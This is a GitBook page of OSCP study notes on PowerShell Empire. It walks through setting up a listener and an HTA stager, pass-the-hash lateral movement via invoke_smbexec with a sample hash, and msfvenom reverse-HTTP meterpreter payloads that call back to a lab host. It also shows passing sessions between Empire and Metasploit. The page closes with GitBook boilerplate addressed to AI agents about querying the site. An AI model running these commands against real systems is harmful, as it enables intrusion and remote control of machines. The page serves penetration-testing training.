> For the complete documentation index, see [llms.txt](https://h3ckt0r.gitbook.io/0xsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://h3ckt0r.gitbook.io/0xsec/offensive-security/oscp/module-23-powershell-empire.md).

# Module 23 (Powershell Empire)

## Powershell Empire&#x20;

### Listener

```
// Empire commands used
?
uselistener http
info
```

<figure><img src="/files/vCQ5KmFF4ECRmT46zH0T" alt=""><figcaption></figcaption></figure>

Starting the listener:

```bash
execute
```

### Stager

Stager will download and execute the final payload which will call back to the listener we set up previously - `http`- below shows how to set it up:

```bash
//specify what stager to use
usestager windows/hta

//associate stager with the http listener
set Listener meterpreter

//write stager to the file
set OutFile stage.hta

//create the stager
execute
```

<figure><img src="/files/6bw7JkIN58v7xM7LS9EL" alt=""><figcaption></figcaption></figure>

### Lateral Movement

```bash
usemodule lateral_movement/technique
usemodule lateral_movement/invoke_smbexec
```

```
set ComputerName client251
set Listener http
set Username jeff_admin
set Hash e2b475c11da2a0748290d87aa966c327
set Domain corp.com
execute
```

### Switching Between Empire and Metasploit

Metasploit to Empire

```
msfvenom -p windows/meterpreter/reverse_http LHOST=10.11.0.4 LPORT=7777 -
f exe -o met.exe
use multi/handler
set payload windows/meterpreter/reverse_http
set LPORT 7777
set LHOST 10.11.0.4
run
```

Empire&#x20;

```
upload /home/h3ckt0r/met.exe
shell dir
shell C:\Users\offsec.corp\Downloads>met.exe
```

Empire to Metasploit

```
 usestager windows/launcher_bat
 set Listener http
 execute
```

Metasploit

```
upload /tmp/launcher.bat
shell
dir
lanucher.bat
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://h3ckt0r.gitbook.io/0xsec/offensive-security/oscp/module-23-powershell-empire.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.